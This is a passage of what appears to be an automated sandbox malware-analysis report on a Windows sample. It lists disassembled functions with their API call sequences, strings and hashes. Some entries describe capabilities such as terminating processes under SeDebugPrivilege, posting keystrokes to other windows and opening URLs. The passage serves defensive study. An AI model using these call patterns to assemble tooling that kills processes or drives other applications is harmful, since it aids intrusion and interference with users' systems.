InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 0027524D
SendMessageW.USER32(?,00001001,00000000,000000FE), ref: 00275287
SendMessageW.USER32(?,00001026,00000000,000000FE), ref: 00275296

Memory Dump Source

Source File: 00000000.00000002.2344802484.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.2344786118.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344926408.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344949229.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_smQoKNkwB7.jbxd

Similarity

API ID: Window$MessageSend$LongShow$DeleteFocusInvalidateObjectRect
String ID:
API String ID: 3210457359-0
Opcode ID: d1a6ae0bed0b5f3777d3f538d161b9d012e92f07ede326a42e414b71aced8d84
Instruction ID: d874fde920ab8b09b62f24a628dd8ffbd6977915bb588a2da65d401384d6a690
Opcode Fuzzy Hash: d1a6ae0bed0b5f3777d3f538d161b9d012e92f07ede326a42e414b71aced8d84
Instruction Fuzzy Hash: A751C530A60A29BEEF249F24CC49B99B765EB04321F54C105FA1D962E1C7F1A9A0DF40

Function 001F8B06 Relevance: 13.7, APIs: 9, Instructions: 155windowCOMMON

Download Yara Rule

APIs

LoadImageW.USER32(00000000,?,?,00000010,00000010,00000010), ref: 00236890
ExtractIconExW.SHELL32(?,?,00000000,00000000,00000001), ref: 002368A9
LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 002368B9
ExtractIconExW.SHELL32(?,?,?,00000000,00000001), ref: 002368D1
SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 002368F2
DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,001F8874,00000000,00000000,00000000,000000FF,00000000), ref: 00236901
SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 0023691E
DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,001F8874,00000000,00000000,00000000,000000FF,00000000), ref: 0023692D

Memory Dump Source

Source File: 00000000.00000002.2344802484.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.2344786118.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344926408.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344949229.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_smQoKNkwB7.jbxd

Similarity

API ID: Icon$DestroyExtractImageLoadMessageSend
String ID:
API String ID: 1268354404-0
Opcode ID: 2ca86a3a1ff3d8d47cf7974533506d9cc7943f3b5e140c28202a6dd264181410
Instruction ID: 6dc1dcc11b6cfbe9e6d2cc7849549409319c694ea567ef7a3f57d5d491bac7da
Opcode Fuzzy Hash: 2ca86a3a1ff3d8d47cf7974533506d9cc7943f3b5e140c28202a6dd264181410
Instruction Fuzzy Hash: C451AAB0610209EFDB24CF24DC99FAA7BB9FB58350F104518FA16972A0DB70E9A0CB50

Function 0025C143 Relevance: 13.6, APIs: 9, Instructions: 95networkCOMMON

Download Yara Rule

APIs

InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 0025C182
GetLastError.KERNEL32 ref: 0025C195
SetEvent.KERNEL32(?), ref: 0025C1A9

Part of subcall function 0025C253: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0025C272
Part of subcall function 0025C253: GetLastError.KERNEL32 ref: 0025C322
Part of subcall function 0025C253: SetEvent.KERNEL32(?), ref: 0025C336
Part of subcall function 0025C253: InternetCloseHandle.WININET(00000000), ref: 0025C341

Memory Dump Source

Source File: 00000000.00000002.2344802484.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.2344786118.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344926408.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344949229.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_smQoKNkwB7.jbxd

Similarity

API ID: Internet$ErrorEventLast$CloseConnectHandleOpen
String ID:
API String ID: 337547030-0
Opcode ID: 908599b0d8384ac00e709fd7c0eb57b047cdc55383ba0ec1c3679001398ca352
Instruction ID: 0a9b2dd0f658427c21628810e7adffca8da6f2f7cd99aeea8200d9cffa76a3cb
Opcode Fuzzy Hash: 908599b0d8384ac00e709fd7c0eb57b047cdc55383ba0ec1c3679001398ca352
Instruction Fuzzy Hash: 51317071110701AFDB219FB5EC48A66BBE9FF58302F20441DFD5AC6611E730E8689F64

Function 002425A2 Relevance: 13.6, APIs: 9, Instructions: 60sleepkeyboardwindowCOMMON

Download Yara Rule

APIs

Part of subcall function 00243A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 00243A57
Part of subcall function 00243A3D: GetCurrentThreadId.KERNEL32 ref: 00243A5E
Part of subcall function 00243A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,002425B3), ref: 00243A65

MapVirtualKeyW.USER32(00000025,00000000), ref: 002425BD
PostMessageW.USER32(?,00000100,00000025,00000000), ref: 002425DB
Sleep.KERNEL32(00000000,?,00000100,00000025,00000000), ref: 002425DF
MapVirtualKeyW.USER32(00000025,00000000), ref: 002425E9
PostMessageW.USER32(?,00000100,00000027,00000000), ref: 00242601
Sleep.KERNEL32(00000000,?,00000100,00000027,00000000), ref: 00242605
MapVirtualKeyW.USER32(00000025,00000000), ref: 0024260F
PostMessageW.USER32(?,00000101,00000027,00000000), ref: 00242623
Sleep.KERNEL32(00000000,?,00000101,00000027,00000000,?,00000100,00000027,00000000), ref: 00242627

Memory Dump Source

Source File: 00000000.00000002.2344802484.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.2344786118.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344926408.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344949229.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_smQoKNkwB7.jbxd

Similarity

API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
String ID:
API String ID: 2014098862-0
Opcode ID: b49dd50b3d814508542e15f139cbf945f3be86df5e12fe0bef3cccd6e8b216dc
Instruction ID: 9839f308120210b922dc4b384c5ea4b52f7f35ed5033ea7af61dc35255f4f01d
Opcode Fuzzy Hash: b49dd50b3d814508542e15f139cbf945f3be86df5e12fe0bef3cccd6e8b216dc
Instruction Fuzzy Hash: 3201B530790220BBFB1467799C8EF593E59DB4AB11F600015F31CAE0D1C9E11494CA69

Function 00241803 Relevance: 13.5, APIs: 9, Instructions: 49memorythreadCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000008,0000000C,?,00000000,?,00241449,?,?,00000000), ref: 0024180C
HeapAlloc.KERNEL32(00000000,?,00241449,?,?,00000000), ref: 00241813
GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00241449,?,?,00000000), ref: 00241828
GetCurrentProcess.KERNEL32(?,00000000,?,00241449,?,?,00000000), ref: 00241830
DuplicateHandle.KERNEL32(00000000,?,00241449,?,?,00000000), ref: 00241833
GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00241449,?,?,00000000), ref: 00241843
GetCurrentProcess.KERNEL32(00241449,00000000,?,00241449,?,?,00000000), ref: 0024184B
DuplicateHandle.KERNEL32(00000000,?,00241449,?,?,00000000), ref: 0024184E
CreateThread.KERNEL32(00000000,00000000,00241874,00000000,00000000,00000000), ref: 00241868

Memory Dump Source

Source File: 00000000.00000002.2344802484.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.2344786118.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344926408.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344949229.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_smQoKNkwB7.jbxd

Similarity

API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
String ID:
API String ID: 1957940570-0
Opcode ID: 8e188573c156dd044bc901a4f00057ef797ec20cda161ac40b38b82e33c1dbda
Instruction ID: 88217dd1e7b893645a131e485d1e395d9ec27f9e34bc3482b03388acbd3a0e4f
Opcode Fuzzy Hash: 8e188573c156dd044bc901a4f00057ef797ec20cda161ac40b38b82e33c1dbda
Instruction Fuzzy Hash: 4D01CDB5240308BFE710AFB5EC4DF6B3BACEB89B11F504425FA09DB1A1CA709850CB20

Function 0026A0E2 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 160COMMON

Download Yara Rule

APIs

Part of subcall function 0024D4DC: CreateToolhelp32Snapshot.KERNEL32 ref: 0024D501
Part of subcall function 0024D4DC: Process32FirstW.KERNEL32(00000000,?), ref: 0024D50F
Part of subcall function 0024D4DC: CloseHandle.KERNEL32(00000000), ref: 0024D5DC

OpenProcess.KERNEL32(00000001,00000000,?), ref: 0026A16D
GetLastError.KERNEL32 ref: 0026A180
OpenProcess.KERNEL32(00000001,00000000,?), ref: 0026A1B3
TerminateProcess.KERNEL32(00000000,00000000), ref: 0026A268
GetLastError.KERNEL32(00000000), ref: 0026A273
CloseHandle.KERNEL32(00000000), ref: 0026A2C4

Strings

SeDebugPrivilege, xrefs: 0026A18F

Memory Dump Source

Source File: 00000000.00000002.2344802484.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.2344786118.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344926408.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344949229.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_smQoKNkwB7.jbxd

Similarity

API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
String ID: SeDebugPrivilege
API String ID: 2533919879-2896544425
Opcode ID: 5de71bbdfb6f9b996aa80d7bfa039219b2320e088961c381aaec63f7b8f3b886
Instruction ID: e198b9c13ae7cba60d54aeaff038475297127c0e722ec39ce6395fc8bf4bc01e
Opcode Fuzzy Hash: 5de71bbdfb6f9b996aa80d7bfa039219b2320e088961c381aaec63f7b8f3b886
Instruction Fuzzy Hash: 8461C0302146429FD320DF19C894F1ABBE1AF54318F54849CE86A9B7A3C772EC95CF92

Function 00273886 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 141windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00273925
SendMessageW.USER32(00000000,00001036,00000000,?), ref: 0027393A
SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00273954
_wcslen.LIBCMT ref: 00273999
SendMessageW.USER32(?,00001057,00000000,?), ref: 002739C6
SendMessageW.USER32(?,00001061,?,0000000F), ref: 002739F4

Strings

SysListView32, xrefs: 002738F7

Memory Dump Source

Source File: 00000000.00000002.2344802484.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.2344786118.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344926408.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344949229.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_smQoKNkwB7.jbxd

Similarity

API ID: MessageSend$Window_wcslen
String ID: SysListView32
API String ID: 2147712094-78025650
Opcode ID: 401f2acc16eb9076813f2529f4f5e966adeb52e2fe9bfd032119df9b351e0177
Instruction ID: 10b4c2565f7fd9c5a639897a1331d6bbd48e73924e3dbbcdef6c4526e23569db
Opcode Fuzzy Hash: 401f2acc16eb9076813f2529f4f5e966adeb52e2fe9bfd032119df9b351e0177
Instruction Fuzzy Hash: B541C371A10319ABEB21DF64CC49BEA77A9EF08350F10452AF95CE7281D7719AA0DB90

Function 0024BC5E Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 137windowCOMMON

Download Yara Rule

APIs

GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 0024BCFD
IsMenu.USER32(00000000), ref: 0024BD1D
CreatePopupMenu.USER32 ref: 0024BD53
GetMenuItemCount.USER32(00B55568), ref: 0024BDA4
InsertMenuItemW.USER32(00B55568,?,00000001,00000030), ref: 0024BDCC

Strings

0, xrefs: 0024BCA8
2, xrefs: 0024BD37

Memory Dump Source

Source File: 00000000.00000002.2344802484.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.2344786118.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344926408.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344949229.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_smQoKNkwB7.jbxd

Similarity

API ID: Menu$Item$CountCreateInfoInsertPopup
String ID: 0$2
API String ID: 93392585-3793063076
Opcode ID: 0ba5932a2279607ecd6498d7a41402084470404666967934f9552265a6f1e476
Instruction ID: 24e40077cf65eed0e827e1f88fab5715ba9a72170a7d2b25e1e1fcc5ff970c47
Opcode Fuzzy Hash: 0ba5932a2279607ecd6498d7a41402084470404666967934f9552265a6f1e476
Instruction Fuzzy Hash: 6551BF70E20206DBDF2ACFB8D8C8BAEBBF4AF45314F244199E411A7290D7B0D965CB51

Function 00202D20 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 117COMMON

Download Yara Rule

APIs

_ValidateLocalCookies.LIBCMT ref: 00202D4B
___except_validate_context_record.LIBVCRUNTIME ref: 00202D53
_ValidateLocalCookies.LIBCMT ref: 00202DE1
__IsNonwritableInCurrentImage.LIBCMT ref: 00202E0C
_ValidateLocalCookies.LIBCMT ref: 00202E61

Strings

&H , xrefs: 00202DFE, 00202E07, 00202E18
csm, xrefs: 00202DF6

Memory Dump Source

Source File: 00000000.00000002.2344802484.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.2344786118.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344926408.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344949229.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_smQoKNkwB7.jbxd

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: &H $csm
API String ID: 1170836740-2339039177
Opcode ID: bf18ee05b2952543d94ee46e2cd267cfe120e47b583d965446ce63f82e19742a
Instruction ID: dbc6b1a402f65f4694786cc9ee216ef2a3f8139ce25cb6dc5bf85e0ca253bff8
Opcode Fuzzy Hash: bf18ee05b2952543d94ee46e2cd267cfe120e47b583d965446ce63f82e19742a
Instruction Fuzzy Hash: 49415434A20309EBCF10DF68C859A9EBBB5AF45314F148156E8146B3D3D771AE29CB90

Function 0024C874 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 81windowCOMMON

Download Yara Rule

APIs

LoadIconW.USER32(00000000,00007F03), ref: 0024C913

Strings

blank, xrefs: 0024C895
stop, xrefs: 0024C8E4
warning, xrefs: 0024C8FC
info, xrefs: 0024C8B4
question, xrefs: 0024C8CC

Memory Dump Source

Source File: 00000000.00000002.2344802484.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.2344786118.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344926408.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344949229.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_smQoKNkwB7.jbxd

Similarity

API ID: IconLoad
String ID: blank$info$question$stop$warning
API String ID: 2457776203-404129466
Opcode ID: c9eaacec733ffca64cd2c339f12f58a4d14f5543427422c38d9f6ee2549249d5
Instruction ID: 85c3fdcefc4e8ac0025cf282fef562a6e506d9c24b5b414cf282eb967d3e366f
Opcode Fuzzy Hash: c9eaacec733ffca64cd2c339f12f58a4d14f5543427422c38d9f6ee2549249d5
Instruction Fuzzy Hash: 5C11EB327BA307BAE7096B5CDC83DBA679CDF16354B30402AF900A62C2EBF45D605664

Function 0024ED19 Relevance: 12.1, APIs: 8, Instructions: 137timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32 ref: 0024ED2A
_wcslen.LIBCMT ref: 0024ED3B
_wcslen.LIBCMT ref: 0024ED79
_wcslen.LIBCMT ref: 0024EDAF
_wcslen.LIBCMT ref: 0024EDDF
_wcslen.LIBCMT ref: 0024EDEF
_wcslen.LIBCMT ref: 0024EE2B
_wcslen.LIBCMT ref: 0024EE5A

Memory Dump Source

Source File: 00000000.00000002.2344802484.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.2344786118.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344926408.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344949229.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_smQoKNkwB7.jbxd

Similarity

API ID: _wcslen$LocalTime
String ID:
API String ID: 952045576-0
Opcode ID: dbe2c7aeb96ded87fd69696121147d720963d5365ec852184f53614626019d65
Instruction ID: 8f55bc5cd06000cf7617435795f3f9cba943a762632b7f177e818c1f7fda3d32
Opcode Fuzzy Hash: dbe2c7aeb96ded87fd69696121147d720963d5365ec852184f53614626019d65
Instruction Fuzzy Hash: EA418365D20218B9DB11FBF4888AACFB7ACAF45710F508462E914E3163FB34D275C7A5

Function 001FF8D8 Relevance: 12.1, APIs: 8, Instructions: 124COMMON

Download Yara Rule

APIs

ShowWindow.USER32(FFFFFFFF,000000FF,?,00000000,?,0023682C,00000004,00000000,00000000), ref: 001FF953
ShowWindow.USER32(FFFFFFFF,00000006,?,00000000,?,0023682C,00000004,00000000,00000000), ref: 0023F3D1
ShowWindow.USER32(FFFFFFFF,000000FF,?,00000000,?,0023682C,00000004,00000000,00000000), ref: 0023F454

Memory Dump Source

Source File: 00000000.00000002.2344802484.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.2344786118.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344926408.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344949229.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_smQoKNkwB7.jbxd

Similarity

API ID: ShowWindow
String ID:
API String ID: 1268545403-0
Opcode ID: 3a833c3d1c06bab3d88b259db95d27a513cd187fe1a68ab2cc2f5312d1ecc844
Instruction ID: 3cfef033c9ce3f93cf7c1a18841e678bb550f48fb2aa5bbc82f9840e0c3637ed
Opcode Fuzzy Hash: 3a833c3d1c06bab3d88b259db95d27a513cd187fe1a68ab2cc2f5312d1ecc844
Instruction Fuzzy Hash: D8414A71614688BAC7789F39A98C73A7B91BF56318F54403CF34B52560C7F2A8D2CB10

Function 00272D03 Relevance: 12.1, APIs: 8, Instructions: 95windowCOMMON

Download Yara Rule

APIs

DeleteObject.GDI32(00000000), ref: 00272D1B
GetDC.USER32(00000000), ref: 00272D23
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00272D2E
ReleaseDC.USER32(00000000,00000000), ref: 00272D3A
CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 00272D76
SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00272D87
MoveWindow.USER32(?,?,?,?,?,00000000,?,?,00275A65,?,?,000000FF,00000000,?,000000FF,?), ref: 00272DC2
SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00272DE1

Memory Dump Source

Source File: 00000000.00000002.2344802484.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.2344786118.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344926408.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344949229.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_smQoKNkwB7.jbxd

Similarity

API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
String ID:
API String ID: 3864802216-0
Opcode ID: 62a43963e331b9c5c56fee24062f88a57913e78c0ace797f2707030f2259538e
Instruction ID: e690f8b19eb9d69ec3d8eedba8cb5c39baa7a57b188020a61d36d20d909f1e43
Opcode Fuzzy Hash: 62a43963e331b9c5c56fee24062f88a57913e78c0ace797f2707030f2259538e
Instruction Fuzzy Hash: 80319C72211214BFEB258F60DC8AFEB3BADEF49711F144059FE0C9A291C6759C90CBA0

Function 00245622 Relevance: 12.1, APIs: 8, Instructions: 92COMMON

Download Yara Rule

APIs

_memcmp.LIBVCRUNTIME ref: 00245637
_memcmp.LIBVCRUNTIME ref: 00245659
_memcmp.LIBVCRUNTIME ref: 00245671
_memcmp.LIBVCRUNTIME ref: 00245684
_memcmp.LIBVCRUNTIME ref: 0024569E
_memcmp.LIBVCRUNTIME ref: 002456B1
_memcmp.LIBVCRUNTIME ref: 002456C9
_memcmp.LIBVCRUNTIME ref: 002456E4

Memory Dump Source

Source File: 00000000.00000002.2344802484.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.2344786118.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344926408.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344949229.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_smQoKNkwB7.jbxd

Similarity

API ID: _memcmp
String ID:
API String ID: 2931989736-0
Opcode ID: 437caedf65f45cef0b67fadf265a5e1445d946c6dc1ed684c79f3bd9aa33cdfe
Instruction ID: 50b0887f3ba80f429f8a8581c051d9a6a258700d280dad55f3a265d03b2b7ef0
Opcode Fuzzy Hash: 437caedf65f45cef0b67fadf265a5e1445d946c6dc1ed684c79f3bd9aa33cdfe
Instruction Fuzzy Hash: 1021F561674A2A77D31D9A208F82FBA334CAE22784F454035FD489A687F770ED3189A5

Function 00264FAE Relevance: 10.9, APIs: 4, Strings: 2, Instructions: 359COMMON

Download Yara Rule

Strings

Not an Object type, xrefs: 00265007
NULL Pointer assignment, xrefs: 0026502E, 00265383

Memory Dump Source

Source File: 00000000.00000002.2344802484.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.2344786118.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344926408.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344949229.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_smQoKNkwB7.jbxd

Similarity

API ID:
String ID: NULL Pointer assignment$Not an Object type
API String ID: 0-572801152
Opcode ID: d91e6ed5c9e8079a21142a319c80592d948c7167e1d79eaa8cbefd999bc6599c
Instruction ID: f76df16a1a8c3fbd88c0795d13c376575b9f87d629269acbb858d2ddf35da799
Opcode Fuzzy Hash: d91e6ed5c9e8079a21142a319c80592d948c7167e1d79eaa8cbefd999bc6599c
Instruction Fuzzy Hash: 97D1D571A1061AAFDF10CFA8C891FAEB7B5FF48344F148069E915AB281E770DDA5CB50

Function 00221522 Relevance: 10.8, APIs: 7, Instructions: 268COMMON

Download Yara Rule

APIs

GetCPInfo.KERNEL32(00000000,00000000,?,7FFFFFFF,?,?,002217FB,00000000,00000000,?,00000000,?,?,?,?,00000000), ref: 002215CE
MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,002217FB,00000000,00000000,?,00000000,?,?,?,?), ref: 00221651
MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,002217FB,?,002217FB,00000000,00000000,?,00000000,?,?,?,?), ref: 002216E4
MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,002217FB,00000000,00000000,?,00000000,?,?,?,?), ref: 002216FB

Part of subcall function 00213820: RtlAllocateHeap.NTDLL(00000000,?,002B1444,?,001FFDF5,?,?,001EA976,00000010,002B1440,001E13FC,?,001E13C6,?,001E1129), ref: 00213852

MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,002217FB,00000000,00000000,?,00000000,?,?,?,?), ref: 00221777
__freea.LIBCMT ref: 002217A2
__freea.LIBCMT ref: 002217AE

Memory Dump Source

Source File: 00000000.00000002.2344802484.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.2344786118.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
